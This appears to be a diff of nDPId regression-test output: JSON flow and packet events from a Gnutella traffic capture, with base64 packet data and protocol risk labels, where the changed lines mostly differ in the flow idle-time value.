-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1033,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":90873,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90873,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":50308,"dst_port":61616,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":2,"flow_last_seen":90872,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90872,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA6gAAEAGqm3BJf+CCgACD\/CwxIQAuJIBv98bx2AS\/\/+nyQAAAgQFtA=="} 
+00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1032,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":3,"flow_last_seen":90872,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90872,"pkt":"UlQAEjUCCAAn5uVZCABFAAAogopAAIAGq44KAAIPwSX\/gsSE8LC\/3xvHALiSAlAQ+vDElQAA"} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1033,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":90873,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90873,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":50308,"dst_port":61616,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1036,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90880,"flow_last_seen":90880,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":90880,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.32.126.214","src_port":28681,"dst_port":59596,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1036,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":1,"flow_last_seen":90880,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":90880,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4YpYAAIARjBkKAAIPwSB+1nAJ6MwAJJ5bn1UxAqnqa\/T\/ZYYW3VylAwABAAUAAADDglFLQA=="} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1037,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":2,"flow_last_seen":90882,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90882,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA6sAAEAGxg9gQUTCCgACD4qZxIkAuYwBsqFtYmAS\/\/\/rIgAAAgQFtA=="} -00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1038,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":3,"flow_last_seen":90882,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90882,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoBGJAAIAGRVwKAAIPYEFEwsSJipmyoW1iALmMAlAQ+vAH7wAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1039,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90883,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90883,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":50313,"dst_port":35481,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1041,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":2,"flow_last_seen":90885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90885,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA60AAEAGpYEtH5hwCgACD2jjxIsAuoYB181ecmAS\/\/\/cDQAAAgQFtA=="} -00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1042,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":3,"flow_last_seen":90885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90885,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoe4VAAIAGrawKAAIPLR+YcMSLaOPXzV5yALqGAlAQ+vD42QAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1043,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90885,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":50315,"dst_port":26851,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1037,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":2,"flow_last_seen":90882,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90882,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA6sAAEAGxg9gQUTCCgACD4qZxIkAuYwBsqFtYmAS\/\/\/rIgAAAgQFtA=="} +00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1038,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_packet_id":3,"flow_last_seen":90882,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90882,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoBGJAAIAGRVwKAAIPYEFEwsSJipmyoW1iALmMAlAQ+vAH7wAA"} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1039,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90883,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90883,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":50313,"dst_port":35481,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1041,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":2,"flow_last_seen":90885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90885,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA60AAEAGpYEtH5hwCgACD2jjxIsAuoYB181ecmAS\/\/\/cDQAAAgQFtA=="} +00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1042,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":3,"flow_last_seen":90885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90885,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoe4VAAIAGrawKAAIPLR+YcMSLaOPXzV5yALqGAlAQ+vD42QAA"} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1043,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90885,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":50315,"dst_port":26851,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00573{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1046,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":2,"flow_last_seen":90892,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":149,"pkt_l4_len":115,"thread_ts_msec":90892,"pkt":"CAAn5uVZUlQAEjUCCABFAACHA68AAEARZkC5u0qtCgACD9DxcAkAc8xj\/3wxAm1gREr\/fw\/7dxmzAwEBAFQAAADx0Lm7Sq0AAAAACAAAAMMCVkNFR1RLR1cDR1VFQQICVVBDAgEJAkRVQ4BRAQE2UCoBbuAAAQAAAAAAAP\/\/C64DVExTQANESFRDAAABglFLRB3BTv4="} 00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1047,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":2,"flow_last_seen":90892,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":149,"pkt_l4_len":115,"thread_ts_msec":90892,"pkt":"CAAn5uVZUlQAEjUCCABFAACHA7AAAEARNxaOhKUNCgACD3dmcAkAc2nw5\/IxAvsVo43\/HfOSkBgzAwEBAFQAAABmd46EpQ0AAAAACAAAAMMCVkNFR1RLR2IDR1VFQQICVVBDAv8HAkRVQ4BRAQE2UCoBBPgcHBMlAAAAAAAAAAEDVExTQANESFRDAAABglFLRFrK9p0="} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1048,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":2,"flow_last_seen":90896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90896,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA7EAAEAGGR5LQAavCgACDxKHxH4Au4ABJ3TJMGAS\/\/\/xsQAAAgQFtA=="} 
-00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1049,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":3,"flow_last_seen":90896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90896,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo3P5AAIAGv9MKAAIPS0AGr8R+EocndMkwALuAAlAQ+vAOfgAA"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1050,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90743,"flow_last_seen":90897,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90897,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.64.6.175","src_port":50302,"dst_port":4743,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":2,"flow_last_seen":90899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90899,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA7MAAEAGUiNhU7eUCgACDyK6xHUAvHoBhjAS2WAS\/\/94KQAAAgQFtA=="} 
-00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1053,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":3,"flow_last_seen":90899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90899,"pkt":"UlQAEjUCCAAn5uVZCABFAAAos+9AAIAGIeoKAAIPYVO3lMR1IrqGMBLZALx6AlAQ+vCU9QAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1058,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90739,"flow_last_seen":90905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90905,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"97.83.183.148","src_port":50293,"dst_port":8890,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1048,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":2,"flow_last_seen":90896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90896,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA7EAAEAGGR5LQAavCgACDxKHxH4Au4ABJ3TJMGAS\/\/\/xsQAAAgQFtA=="} 
+00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1049,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":3,"flow_last_seen":90896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90896,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo3P5AAIAGv9MKAAIPS0AGr8R+EocndMkwALuAAlAQ+vAOfgAA"} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1050,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90743,"flow_last_seen":90897,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90897,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.64.6.175","src_port":50302,"dst_port":4743,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":2,"flow_last_seen":90899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90899,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA7MAAEAGUiNhU7eUCgACDyK6xHUAvHoBhjAS2WAS\/\/94KQAAAgQFtA=="} 
+00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1053,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":3,"flow_last_seen":90899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90899,"pkt":"UlQAEjUCCAAn5uVZCABFAAAos+9AAIAGIeoKAAIPYVO3lMR1IrqGMBLZALx6AlAQ+vCU9QAA"} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1058,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90739,"flow_last_seen":90905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90905,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"97.83.183.148","src_port":50293,"dst_port":8890,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1062,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":2,"flow_last_seen":90907,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":90907,"pkt":"CAAn5uVZUlQAEjUCCABFAAB0A7gAAEARKrzBIH7WCgACD+jMcAkAYGMhn1UxAqnqa\/T\/ZYYW3VylAwEBAEEAAADM6MEgftYIAAAAAAACAMMCVkNFR1RLR2IDR1VFQQICVVBDAgEFAkRVQ4BRAQNUTFNAA0RIVEMAAAGCUUtEmpBNrg=="} 
-00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1088,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":2,"flow_last_seen":91051,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91051,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA8YAAEAGMiyVHKOvCgACD8MkxIcAvm4BvtmXiWAS\/\/8GbQAAAgQFtA=="} -00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":3,"flow_last_seen":91052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91052,"pkt":"UlQAEjUCCAAn5uVZCABFAAAozKZAAIAG6U4KAAIPlRyjr8SHwyS+2ZeJAL5uAlAQ+vAjOQAA"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1090,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":2,"flow_last_seen":91057,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91057,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA8cAAEAG2CXL3Mb0CgACDwSqxHsAv2gBodiVp2AS\/\/+P0AAAAgQFtA=="} -00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":3,"flow_last_seen":91057,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91057,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoTH9AAIAGD3EKAAIPy9zG9MR7BKqh2JWnAL9oAlAQ+vCsnAAA"} 
-00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1092,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":2,"flow_last_seen":91058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91058,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA8gAAEAG\/LTc7pFSCgACD4L3xIIAwGIBECov1GAS\/\/8zjQAAAgQFtA=="} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1093,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":91058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91058,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":50311,"dst_port":49956,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1094,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":3,"flow_last_seen":91058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91058,"pkt":"UlQAEjUCCAAn5uVZCABFAAAouGtAAIAGyBQKAAIP3O6RUsSCgvcQKi\/UAMBiAlAQ+vBQWQAA"} 
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90744,"flow_last_seen":91058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91058,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.238.145.82","src_port":50306,"dst_port":33527,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1098,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90742,"flow_last_seen":91059,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91059,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":50299,"dst_port":1194,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1100,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":2,"flow_last_seen":91062,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91062,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA8wAAEAG\/T488TDCCgACD1M1xIUAwVwBVNBhD2AS\/\/\/z9wAAAgQFtA=="} -00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1101,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":3,"flow_last_seen":91062,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91062,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoxU5AAIAGu78KAAIPPPEwwsSFUzVU0GEPAMFcAlAQ+vAQxAAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1102,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":91062,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":91062,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":50309,"dst_port":21301,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
